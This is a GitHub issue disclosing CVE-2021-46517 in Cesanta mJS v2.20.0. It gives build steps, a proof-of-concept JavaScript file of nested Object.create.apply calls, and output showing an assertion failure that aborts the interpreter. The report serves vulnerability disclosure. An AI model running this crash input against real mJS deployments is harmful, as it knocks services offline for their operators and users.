Headline
CVE-2021-46517: Assertion `mjs_stack_size(&mjs->scopes) > 0' failed src/mjs_exec.c:725: mjs_execute. · Issue #184 · cesanta/mjs
There is an Assertion `mjs_stack_size(&mjs->scopes) > 0’ failed at src/mjs_exec.c in Cesanta MJS v2.20.0.
mJS revision
Commit: b1b6eac
Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
Build steps
vim Makefile DOCKER_GCC=gcc DOCKER_CLANG=clang $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)
save the makefile then make
make
Test casepoc.js
(function() {
((function JSEtest(a) {
if (a > 3) {
if ([((function JSEtest(a) {
if (a > 3) {
if ([Object.create.apply({}, [Object])]) {
Object.create.apply({}, [Object])
}
}
})(6))([((function JSEtest(a) {
if (a > 3) {
if ([Object.create.apply({}, [Object])]) {
Object.create.apply({}, [Object])
}
}
})(6))({}, [Object])])]) {
Object.create.apply({}, [Object])
}
}
})(6))
})()
Execution steps & Output
$ ./mjs/build/mjs poc.js
mjs: src/mjs_exec.c:725: mjs_execute: Assertion `mjs_stack_size(&mjs->scopes) > 0’ failed. [1] 111718 abort mjs poc.js